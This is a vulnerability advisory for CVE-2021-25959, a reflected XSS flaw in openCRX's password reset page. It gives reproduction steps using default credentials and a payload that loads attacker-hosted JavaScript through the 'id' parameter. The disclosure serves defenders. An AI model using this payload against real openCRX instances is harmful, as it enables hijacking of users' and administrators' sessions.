CVE-2021-25959

Overview

In OpenCRX, versions v4.0.0 through v5.1.0 are vulnerable to reflected Cross-site Scripting (XSS), due to unsanitized parameters in the password reset functionality. This allows execution of external javascript files on any user of the openCRX instance.

Details

OpenCRX is affected by a reflected XSS vulnerability that allows execution of external javascript files on any user of the openCRX instance. This vulnerability exists due to unsanitized parameters in the password reset functionality.

PoC Details

Login to the application as guest:guest via visiting http://localhost:8080/opencrx-core-CRX.
Click on Security, Request password reset. Click ok. A password request link shows up in the Alerts tab. Click on the yellow icon to open it. Copy the password reset URL. A password reset URL example looks like this:
“http://localhost:8080/opencrx-core-CRX/PasswordResetConfirm.jsp?t=cO6BzWLpIElr5CF4n8IjzzZPmKrOuE1OIcJLIMWZ&p=CRX&s=Standard&id=guest”.
In the `id` parameter, insert the given payload (note: Change ip and port accordingly).
Create a file poc.js locally and start a python server in the file directory where the JS file is present. Now login as admin-Standard:admin-Standard in a private window. Paste the URL with the payload in the `id` parameter value. The external JS file is successfully called.

PoC Code

<script src="http://10.0.2.15/poc.js"></script>

Affected Environments

v4.0.0 - v5.1.0

Prevention

Upgrade to version org.opencrx:opencrx-core-config:5.2.0